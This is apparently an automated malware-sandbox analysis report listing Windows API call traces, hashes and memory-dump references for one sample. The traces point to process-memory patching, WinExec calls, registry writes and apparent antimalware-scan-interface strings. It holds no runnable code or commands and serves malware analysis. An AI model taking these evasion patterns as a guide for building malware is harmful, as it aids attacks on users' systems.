                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • WinExec.KERNEL32(?,?), ref: 02908624
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$Exec
                                                          • String ID: Kernel32$WinExec
                                                          • API String ID: 2292790416-3609268280
                                                          • Opcode ID: aef07323a2ffd57e66b78476f1ca09e25d7e57f4973daa23fcf4d77bdc2ec59d
                                                          • Instruction ID: 83aa1535c61e58ef0e08d11eeabec55ffa302d0401f91c59e92252d72c98692c
                                                          • Opcode Fuzzy Hash: aef07323a2ffd57e66b78476f1ca09e25d7e57f4973daa23fcf4d77bdc2ec59d
                                                          • Instruction Fuzzy Hash: D8018178784308BFEB40EBE8EC81F6A77EDFB88B00F514461BA04D6680D670AD108A65
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • WinExec.KERNEL32(?,?), ref: 02908624
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$Exec
                                                          • String ID: Kernel32$WinExec
                                                          • API String ID: 2292790416-3609268280
                                                          • Opcode ID: f9e19bd291aa5e894e5160548dda4055f6e916810b161120fcab98bb900e492a
                                                          • Instruction ID: ee0f56a507bf1df700794156f961db20a163b5319d02642a66ab8797dc87178d
                                                          • Opcode Fuzzy Hash: f9e19bd291aa5e894e5160548dda4055f6e916810b161120fcab98bb900e492a
                                                          • Instruction Fuzzy Hash: 50F08178784308BFEB40EBE8EC81F6A77EDFB88B00F514461BA04D6680D670AD108A65
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02905D74,?,?,02903900,00000001), ref: 02905C88
                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02905D74,?,?,02903900,00000001), ref: 02905CB6
                                                            • Part of subcall function 028F7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02903900,02905CF6,00000000,02905D74,?,?,02903900), ref: 028F7DAA
                                                            • Part of subcall function 028F7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02903900,02905D11,00000000,02905D74,?,?,02903900,00000001), ref: 028F7FB7
                                                          • GetLastError.KERNEL32(00000000,02905D74,?,?,02903900,00000001), ref: 02905D1B
                                                            • Part of subcall function 028FA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028FC3D9,00000000,028FC433), ref: 028FA797
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                          • String ID:
                                                          • API String ID: 503785936-0
                                                          • Opcode ID: 6d04214e6820e748aea69329106601bf305b47296fc64002d62628e85bab3fd2
                                                          • Instruction ID: 7511205bfdd3c302922f177b6a8cfa8f1a420139c0bc0a54dd2cecab21a0e7e7
                                                          • Opcode Fuzzy Hash: 6d04214e6820e748aea69329106601bf305b47296fc64002d62628e85bab3fd2
                                                          • Instruction Fuzzy Hash: 8E319378A006099FDB40EFA8C881BAEB7F6BF48700F918565D604EB3D0E7755D048FA6
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A6BA58), ref: 0290F258
                                                          • RegSetValueExA.ADVAPI32(00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F290
                                                          • RegCloseKey.ADVAPI32(00000884,00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F29B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 779948276-0
                                                          • Opcode ID: dfb55a50c172fb1f10267975d8694654a806ae7fb705cbf27dbc9ee91a5543ac
                                                          • Instruction ID: 555db5e2d7a5572f0af47e8551dbb277e2c16c22dac49022af2d8005f1e2714b
                                                          • Opcode Fuzzy Hash: dfb55a50c172fb1f10267975d8694654a806ae7fb705cbf27dbc9ee91a5543ac
                                                          • Instruction Fuzzy Hash: C311FEB9740208AFD740EF6CD88595A77EDEB08700B404962FB14E7650EB31DA418F65
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A6BA58), ref: 0290F258
                                                          • RegSetValueExA.ADVAPI32(00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F290
                                                          • RegCloseKey.ADVAPI32(00000884,00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F29B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 779948276-0
                                                          • Opcode ID: 748e7a6732feb1cec8dd7a63014fdfd92cae1f20400bba065c2b5e4a4d8f3f81
                                                          • Instruction ID: 771dc22c3baaf8658cda7965ddc6f8c3492bfd9706635040c486f3a5b299a2a7
                                                          • Opcode Fuzzy Hash: 748e7a6732feb1cec8dd7a63014fdfd92cae1f20400bba065c2b5e4a4d8f3f81
                                                          • Instruction Fuzzy Hash: 8211FBB9740208AFDB40EFACD88599A77ADEB08700B404962FB14E7650EB31EA418F65
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: b2480b1dd8cc4e38e42248aeefb1d9c0b1ec74722d6a1d39fe984ee7ac750093
                                                          • Instruction ID: e33698308535a2e5734c8d12fe8529448c147584ef5b862e08c31879a133e5a0
                                                          • Opcode Fuzzy Hash: b2480b1dd8cc4e38e42248aeefb1d9c0b1ec74722d6a1d39fe984ee7ac750093
                                                          • Instruction Fuzzy Hash: FCF0AF2D708118CB8BA0BF3D8C8C66E279A5F407447081436A74ADB171CB649C49CB63
                                                          APIs
                                                          • SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 028F4D5B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 028F4D6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                          • Instruction ID: 15d78c39510a66dea185769363c708af75a73d048fc189bbd7025b9ff6c4c3b1
                                                          • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                          • Instruction Fuzzy Hash: 07E02BBC2012059EFFC4AF21CC44B37332AAFC1741B24809AEB08CE014E739D440AD38
                                                          APIs
                                                          • SysFreeString.OLEAUT32(?), ref: 029073DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeString
                                                          • String ID: H
                                                          • API String ID: 3341692771-2852464175
                                                          • Opcode ID: 188757b84dc2cf0fadf594f61ffbc7434b565e31efbd4488adfaa5bd643db001
                                                          • Instruction ID: d528acaf062e034d77347c6af34bf9a90ae1c5bd47133afc697afc52687404d8
                                                          • Opcode Fuzzy Hash: 188757b84dc2cf0fadf594f61ffbc7434b565e31efbd4488adfaa5bd643db001
                                                          • Instruction Fuzzy Hash: 78B1B078A016089FDB15CF99E4C0A9DFBF6FF89324F248569E945AB3A0D730A845CF50
                                                          APIs
                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 028FE781
                                                            • Part of subcall function 028FE364: VariantClear.OLEAUT32(?), ref: 028FE373
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Variant$ClearCopy
                                                          • String ID:
                                                          • API String ID: 274517740-0
                                                          • Opcode ID: 0a34949383bf7d13b5a3faae043f40005bfcacec78baab6887ec5ebd1c258b03
                                                          • Instruction ID: 1f6b21d46ef36d1a60e6eb46bb518b55e877ee295fc711fdc9d50fa31a01a2e5
                                                          • Opcode Fuzzy Hash: 0a34949383bf7d13b5a3faae043f40005bfcacec78baab6887ec5ebd1c258b03
                                                          • Instruction Fuzzy Hash: 4411702C7102148BC7B0AF2DC8C4A6A679AAF847507108466E74ACB675DB30DC45CA62
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 3e086dd32d2f9f2b1e5f95cb241ee66af64b0feb9c9c6f036bcf0239cf0c7956
• Instruction ID: 9e902b74b930a18956becd8094daf0d1ee2f75a43b72eee53ad5c8772332f27d
• Opcode Fuzzy Hash: 3e086dd32d2f9f2b1e5f95cb241ee66af64b0feb9c9c6f036bcf0239cf0c7956
• Instruction Fuzzy Hash: 4931647D6005089FDB90DFACD884AAE77E9EB1C304F448469FB09D3260D734D950CBA6
APIs
  • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
  • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
  • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
  • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
  • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
  • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
  • Part of subcall function 02908338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029083C2), ref: 029083A4
• FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
• String ID:
• API String ID: 1478290883-0
• Opcode ID: 743e89804e6285e9b24dc83e1f57a8eb724da7f53052287bb5baac1b03f9417b
• Instruction ID: cd241b581d75b849b6a2189c0de25758004064d396056d454b45ab03aa67b7be
• Opcode Fuzzy Hash: 743e89804e6285e9b24dc83e1f57a8eb724da7f53052287bb5baac1b03f9417b
• Instruction Fuzzy Hash: 65213978780308AFE740F7F9EC46B9EB7A9EB84710F500461BB14E72D0D674A9409E2D
APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,02906DB9,?,?,?,00000000), ref: 02906D99
  • Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: 8143f5a779a5fa5c08896ee544cff83bdf67b522d9ceeef0035c5efb1caedf99
• Instruction ID: f10e25d9ae2363a2a167edf03fe7f84f8c367d0aeca2d4e92bf34b31a1804805
• Opcode Fuzzy Hash: 8143f5a779a5fa5c08896ee544cff83bdf67b522d9ceeef0035c5efb1caedf99
• Instruction Fuzzy Hash: 0DE0A03E20020CAFE311FA6A9C9194E77ADDF8A710B5104B2A600D2580DA316E108861
APIs
• GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028F5886
  • Part of subcall function 028F5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5AE8
  • Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B06
  • Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B24
  • Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5B42
  • Part of subcall function 028F5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B8B
  • Part of subcall function 028F5ACC: RegQueryValueExA.ADVAPI32(?,028F5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001), ref: 028F5BA9
  • Part of subcall function 028F5ACC: RegCloseKey.ADVAPI32(?,028F5BD8,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5BCB
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction ID: c294ad992d8bd94d6c3c5f31d913b98d7560a9cb41abc76013909b75c2e70d18
• Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction Fuzzy Hash: 61E06D79A003149FCB50DE9CC8C4B4733D8AB08750F440961EE58CF346D7B4D9608BD1
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028F7DF4
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction ID: d749405eb78f1057c62dfb4422e47c813cfb532c69dadafafae2ced4f656b156
• Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction Fuzzy Hash: F8D05BBA3091507AE224965F5D44EA75BDCCBC6770F10473EF668C7180E7208C05C771
APIs
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction ID: af0a6db11caf88e741c81a036cf46f826f7317f1e83f6ee8e9373668da424d1e
• Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction Fuzzy Hash: A2C012AE60023097FBA19699ACC475363CC9B05295B1500A2D708D7250E374D80046A1
APIs
• GetFileAttributesA.KERNEL32(00000000,?,0291356F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,Initialize), ref: 028F7E8B
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
• Instruction ID: 410dbea8ee59e28dafc556db8139491c86078c2224acd5eb61adb03fe4f06c4e
• Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
• Instruction Fuzzy Hash: F4C08CFE3112010A2EE0A5FC1CC421A43990984135B601F23EB3CCA2D2F31A98222822
APIs
• GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
• Instruction ID: e49dfbfca35ef0dbe1e4708ede6954e8aac7214e247de2f61e9191a5b3aaba49
• Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
• Instruction Fuzzy Hash: 70C08CAC3012010A6AD065BC2CC424A538A0D042397640B23AB3CC62E2F32698A32812
APIs
• timeSetEvent.WINMM(00002710,00000000,0291C350,00000000,00000001), ref: 0291C36C
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: c42fc32bdf70ea5a9f2b6adf87ad1528483a4751f0ee086d4570fb022f563f4d
• Instruction ID: 7e43b029b8af8449d902acdd7a79b86461cce64a9e169a10e6a36b621f28de1b
• Opcode Fuzzy Hash: c42fc32bdf70ea5a9f2b6adf87ad1528483a4751f0ee086d4570fb022f563f4d
• Instruction Fuzzy Hash: C7C048B67903042AFA10A6AA5C82F26569D9705B10F100812B704EA2C2D6A2A9114E69
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 028F4C3F
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction ID: 1cb7021cf275ed473819465a34e6371c5b4c4e290c818da43a9ecc325871e971
• Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction Fuzzy Hash: 4EB0123D20820955FAD833A20F00733034C0B4028AF8520539F1CC80E4FB21C0119836
APIs
• SysFreeString.OLEAUT32(00000000), ref: 028F4C57
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction ID: 4d9fc28f8c48161be9183dda707974159fc502c1d44b26a97ecc3e4ec0c90a0d
• Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction Fuzzy Hash: DEA022AC0003038AAF8B33AC002002F23333FE03003C8C0E88308CA000EF3B8000AC30
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028F1A03,?,028F1FC1), ref: 028F15E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028F1FC1), ref: 028F16A4
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028F1FE4), ref: 028F1704
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0290ADA3,?,?,0290AE35,00000000,0290AF11), ref: 0290AB30
                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0290AB48
                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0290AB5A
                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0290AB6C
